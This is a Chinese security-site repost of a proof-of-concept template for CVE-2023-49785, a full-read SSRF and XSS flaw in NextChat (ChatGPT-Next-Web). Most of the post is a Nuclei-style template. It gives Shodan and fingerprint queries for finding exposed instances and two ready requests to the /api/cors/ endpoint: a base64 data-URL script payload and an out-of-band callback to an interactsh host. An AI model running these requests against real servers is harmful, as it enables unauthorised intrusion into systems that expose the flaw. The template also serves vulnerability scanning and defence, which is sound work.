CVE-2023-49785

admin 2024年3月25日21:39:43评论24 views字数 1282阅读4分16秒阅读模式

使使使

影响版本

title="NextChat"

CVE-2023-49785

poc&exp

id: CVE-2023-49785info:  name: ChatGPT-Next-Web - SSRF/XSS  author: high  severity: critical  description: |    Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web  remediation: |    Do not expose to the Internet  reference:    - https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N    cvss-score: 9.1    cve-id: CVE-2023-49785  metadata:    max-request: 1    shodan-query: title:NextChat,"ChatGPT Next Web"    verified: true  tags: cve,cve2023,ssrf,xss,chatgpt,nextchathttp:  - method: GET    path:      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"    matchers-condition: or    matchers:      - type: dsl        dsl:          - contains(body_1, "<script>alert(document.domain)</script>")          - contains(header_1, "text/html")        condition: and      - type: dsl        dsl:          - contains(header_2,'X-Interactsh-Version')          - contains(interactsh_protocol_2,'dns')        condition: and

CVE-2023-49785CVE-2023-49785

原文始发于微信公众号(漏洞猎人):CVE-2023-49785

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月25日21:39:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-49785https://cn-sec.com/archives/2601434.html

发表评论

匿名网友 填写信息